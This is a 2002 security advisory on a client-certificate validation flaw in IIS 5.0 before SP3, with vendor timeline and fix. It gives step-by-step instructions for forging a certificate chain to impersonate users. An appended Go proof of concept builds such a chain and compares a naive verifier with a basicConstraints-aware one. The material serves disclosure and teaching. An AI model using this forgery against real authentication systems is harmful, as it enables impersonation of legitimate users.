-----------------------------------------------------------------------------------
Sentor Torparfar Advisory #001
Title: Insufficient Verification of Client Certificates in IIS 5.0 pre SP3
Date: August 16, 2002
Author: Johan Persson <johan.person@sentor.se>
-----------------------------------------------------------------------------------

Summary:

When an SSL connection is set up between IIS 5.0 pre SP3 and a client, the server verifies that the client certificate is ultimately issued by a trusted root authority (as defined by the CTL) and that none of the certificates in the chain have expired. Several checks are not performed. In particular, there is no verification of the basicConstraints extension, which is what marks a certificate as belonging to a CA and therefore permitted to issue further certificates. Since all subsequent validity checks (client certificate mapping, ASP methods, etc.) only look at the subfields (O, OU, CN, etc.) of the subject and/or issuer, it is trivial to spoof your identity.

Details:

Vulnerable systems: Windows 2000, IIS 5.0 pre SP3
Not vulnerable: Windows 2000, IIS 5.0 SP3

I have no idea whether there are similar vulnerabilities in any of the other versions of IIS, as I haven't checked.

Description:

The validity of a client certificate chain is not properly checked on the server side of an SSL connection involving IIS 5.0 pre SP3. In particular, there is no verification of basicConstraints, so the key of any ordinary end-entity certificate that chains to a trusted root can be used to sign further certificates, and the server accepts the result as a valid chain. Since client certificate mapping, as well as other methods of authentication using certificates, relies on the information contained in the subfields of the subject (client) and issuer, it is possible to create false credentials that can be used to impersonate any valid user.

Impact:

In a system that relies on client-side certificates for authentication, it is possible to impersonate any user whose public details (certificate subfields) are known.

Exploit:

1. Get a (any) valid certificate which is ultimately issued by a root authority trusted by the target server.
2. Create a certificate request containing whatever fields you need to impersonate the issuer you want to spoof.
3. Sign this request using the private key corresponding to your valid certificate.
4. Create a certificate request containing whatever fields you need to impersonate the subject you want to spoof.
5. Sign this request using the private key that corresponds to the certificate you created in step 3.

I will not release detailed exploit information. OpenSSL and some experimenting should suffice.

Vendor Status:

Microsoft contacted June 24, 2002
Microsoft provided me with a hotfix July 18, 2002
The fix is included in Service Pack 3

Solution:

Get and install Service Pack 3 from Microsoft.

0nd/Ag3nt0nd/0rm/Torparfar
-----------------------------------------------------------------------------------
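The forgery described in the exploit steps, as an added example that is not part of the original advisory and contains no IIS code: it builds the chain in Go's standard crypto/x509 library and runs it through two verifiers. naiveVerify models only the checks the advisory says pre-SP3 IIS performed (every signature valid, nothing expired, chain ends at a trusted root) and is this example's own construction, not Microsoft's code; strictVerify is x509.Verify, which enforces basicConstraints and rejects the chain because "Mallory" is not a CA. The CA name "Example Root CA" and the users "Mallory" (the attacker's legitimately issued certificate) and "Alice" (the victim) are constructed sample data. The CSR steps are collapsed: the example issues the certificates directly, since the request only carries the key and the spoofed fields.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// issue generates a P-256 key and a certificate for subject, signed by
// parentKey (pass nil parent for a self-signed root). Only a CA gets the
// CA:TRUE basic constraint and the keyCertSign key usage.
func issue(serial int64, subject pkix.Name, isCA bool,
	parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               subject,
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
	}
	if isCA {
		tmpl.KeyUsage = x509.KeyUsageCertSign
	}
	signer := parentKey
	if parent == nil { // self-signed root
		parent, signer = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert, key
}

// naiveVerify models the pre-SP3 checks the advisory describes: each
// certificate is within its validity period, each signature verifies under
// the next certificate's public key, and the top of the chain is a trusted
// root. It deliberately never looks at basicConstraints or keyUsage.
func naiveVerify(chain, roots []*x509.Certificate, now time.Time) error {
	for i, cert := range chain {
		if now.Before(cert.NotBefore) || now.After(cert.NotAfter) {
			return fmt.Errorf("certificate %q is outside its validity period", cert.Subject.CommonName)
		}
		if i+1 < len(chain) {
			parent := chain[i+1]
			// Raw signature check only: CheckSignature does not consult the
			// parent's CA flag, which is exactly the missing check.
			if err := parent.CheckSignature(cert.SignatureAlgorithm, cert.RawTBSCertificate, cert.Signature); err != nil {
				return err
			}
		}
	}
	top := chain[len(chain)-1]
	for _, r := range roots {
		if bytes.Equal(r.Raw, top.Raw) {
			return nil
		}
	}
	return errors.New("chain does not end in a trusted root")
}

// strictVerify uses x509.Verify, which refuses to let a certificate without
// CA:TRUE act as an issuer.
func strictVerify(chain, roots []*x509.Certificate) error {
	rootPool, inter := x509.NewCertPool(), x509.NewCertPool()
	for _, r := range roots {
		rootPool.AddCert(r)
	}
	for _, c := range chain[1 : len(chain)-1] {
		inter.AddCert(c)
	}
	_, err := chain[0].Verify(x509.VerifyOptions{Roots: rootPool, Intermediates: inter})
	return err
}

// Outcome records what each verifier decided and the identity fields a
// subject/issuer-based mapping (as in IIS) would read from the forged leaf.
type Outcome struct {
	NaiveAcceptsForged, StrictAcceptsForged bool
	NaiveAcceptsLegit, StrictAcceptsLegit   bool
	ForgedSubjectCN, ForgedIssuerCN         string
}

// Demo builds the chain from the advisory's exploit steps (constructed names).
func Demo() Outcome {
	caName := pkix.Name{CommonName: "Example Root CA", Organization: []string{"Example Corp"}}
	root, rootKey := issue(1, caName, true, nil, nil)
	// Step 1: the attacker's own, legitimately issued end-entity cert (CA:FALSE).
	mallory, malloryKey := issue(2, pkix.Name{CommonName: "Mallory", Organization: []string{"Example Corp"}}, false, root, rootKey)
	// Steps 2-3: a cert copying the real CA's subject, signed with Mallory's key.
	fakeCA, fakeCAKey := issue(3, caName, true, mallory, malloryKey)
	// Steps 4-5: a cert for the victim "Alice", signed by the fake CA.
	fakeAlice, _ := issue(4, pkix.Name{CommonName: "Alice", Organization: []string{"Example Corp"}}, false, fakeCA, fakeCAKey)

	roots := []*x509.Certificate{root}
	forged := []*x509.Certificate{fakeAlice, fakeCA, mallory, root}
	legit := []*x509.Certificate{mallory, root}
	now := time.Now()
	return Outcome{
		NaiveAcceptsForged:  naiveVerify(forged, roots, now) == nil,
		StrictAcceptsForged: strictVerify(forged, roots) == nil,
		NaiveAcceptsLegit:   naiveVerify(legit, roots, now) == nil,
		StrictAcceptsLegit:  strictVerify(legit, roots) == nil,
		ForgedSubjectCN:     fakeAlice.Subject.CommonName,
		ForgedIssuerCN:      fakeAlice.Issuer.CommonName,
	}
}

func main() {
	o := Demo()
	fmt.Printf("forged leaf presents subject CN=%q, issuer CN=%q\n", o.ForgedSubjectCN, o.ForgedIssuerCN)
	fmt.Printf("pre-SP3 style check accepts forged chain:  %v\n", o.NaiveAcceptsForged)
	fmt.Printf("basicConstraints-aware check accepts it:  %v\n", o.StrictAcceptsForged)
}
```

The point of the two verifiers is that the forged leaf carries exactly the subject and issuer fields a mapping rule for Alice would match on, so any server-side logic that trusts those fields after the naive chain check is fully bypassed; the only thing that separates the accepted and rejected outcomes is whether the verifier looks at the CA flag of each certificate that signed another.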